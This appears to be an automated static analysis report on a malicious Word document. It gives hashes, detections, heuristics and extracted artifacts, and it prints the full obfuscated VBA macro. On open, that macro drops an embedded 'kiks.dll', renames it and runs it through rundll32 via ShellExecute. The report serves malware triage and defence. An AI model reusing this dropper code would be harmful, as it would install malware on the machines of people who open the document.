Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 99d14786b9fe90f4…

MALICIOUS

Office (OLE)

1.30 MB Created: 2021-06-23 12:50:00 Authoring application: Microsoft Office Word First seen: 2021-07-02
MD5: 0bfc2f84f194156f0961b08d1caa87be SHA-1: f563ba758b4aeb0b8348d614552e85adbe34528a SHA-256: 99d14786b9fe90f44c75509de1032cf1e506052968b1408e9525ec8adfeca9bf
550 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing VBA macros. The Document_Open macro is designed to execute upon opening, and it attempts to download and execute a second-stage payload named 'kikus.dll' using the reconstructed command 'run2l32'. This payload is likely malicious, as indicated by the ClamAV detection of 'Doc.Downloader.Jrat-6336393-1' and the embedded PE executable.

Heuristics 14

  • Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • ClamAV: Doc.Downloader.Jrat-6336393-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Jrat-6336393-1
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • Reference to WinExec API high SC_STR_WINEXEC
    Reference to WinExec API
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Ole10Native package carries executable/script file type high OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in an executable or script-capable extension. Even without UI extension spoofing, embedding a runnable payload inside an Office document is a high-risk delivery pattern.
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
       Set vbvcx = CreateObject("Scripting.FileSystemObject")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2719 bytes
SHA-256: b63fa2303f27e014e38c8c1471933c1dbb661e0d8d57af7ef2b73e4c07a34a03
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Option Compare Text
  Private Declare PtrSafe Function gc Lib "shell32" _
        Alias "ShellExecuteA" (ByVal hwnd As Long, _
        ByVal lpOperation As String, ByVal lpFile As String, _
        ByVal lpParameters As String, ByVal lpDirectory As String, _
        ByVal nShowCmd As Long) As Long
        Dim hdv As String
Private Sub Document_Open()
Dim vcbc As String
Dim bbbb As String
Dim cx
cx = wdUserTemplatesPath
bbbb = "run" & "dl"
vcbc = Options.DefaultFilePath(cx)

If Dir(vcbc & "\kikus.dll") = "" Then
Call yyy

If Len(hdv) > 2 Then

Call nam(hdv)




 Dim cvzz As String
cvzz = "l3" & "2"


  gc 0, vbNullString, _
    bbbb & cvzz, vcbc & "\kikus.dll,OFCBWXTHRNL", _
     vbNullString, 1
End If
End If
End Sub



Sub hdhdd(asda As String)


 Dim vbvcx As Object
   Set vbvcx = CreateObject("Scripting.FileSystemObject")
Call Search(vbvcx.GetFolder(asda), hdv)

End Sub

Sub yyy()
  Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.TypeBackspace
    Selection.Copy
    Call bvxfcsd
End Sub






Attribute VB_Name = "Module1"
Dim pls As String


Sub nam(pafs As String)
Call ousx
Dim oxl
oxl = ".dll"
Name pafs As pls & "\kikus" & oxl
End Sub


Sub uoia(fffs As String)
pls = fffs
End Sub
 
 Sub Search(mds As Object, pafs As String)
 Dim Nedc As Object

  
   For Each Nedc In mds.SubFolders
     Search Nedc, pafs
   Next Nedc
Dim Ters As Object
   For Each Ters In mds.Files
   
   If Ters.Name = "kiks.dll" Then
       
        pafs = Ters
        End If
   Next Ters
   Exit Sub
ErrHandle:
   
   Err.Clear
End Sub





Attribute VB_Name = "Module2"

Sub ousx()
Call uoia(Options.DefaultFilePath(wdUserTemplatesPath))
End Sub

Attribute VB_Name = "Module3"
Sub bvxfcsd()

Dim dfbvc As String
dfbvc = "al" & "\Te"

Dim ewrwsdf As String
ewrwsdf = "L" & "o" & "c" & dfbvc & "mp"



    ntgs = 50
sda = 49


While sda < 50
      ntgs = ntgs - 1

      If Dir(Left(Options.DefaultFilePath(wdUserTemplatesPath), ntgs) & ewrwsdf, vbDirectory) = "" Then
        
    Else
  
   sda = 61
    End If

   Wend
   Call ThisDocument.hdhdd(Left(Options.DefaultFilePath(wdUserTemplatesPath), ntgs) & ewrwsdf)
End Sub
embedded_office_0008fa71.exe embedded-pe Office MZ+PE at offset 0x8FA71 778127 bytes
SHA-256: 585f61d3c26262ce479abfcdc027005438853fa86a376f61cc828e96f8090e14
Detection
ClamAV: Win.Packed.Midie-10008727-0
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1685932759/Ole10Native 738613 bytes
SHA-256: 9c63ba26b4524d8584f51e0f07bfaa8d53a1620179af4f4f696a009994169fbe
ole10native_00_kiks.dll ole-package-payload OLE Ole10Native payload: ObjectPool/_1685932759/Ole10Native; display_name=kiks.dll; full_path=C:\Users\MyPc\AppData\Local\Temp\kiks.dll; temp_path=; def_file= 738304 bytes
SHA-256: 50c79e0302806fba97663b7d6d9d2bb6640e4eec395adb7f49ca777e9e81e15e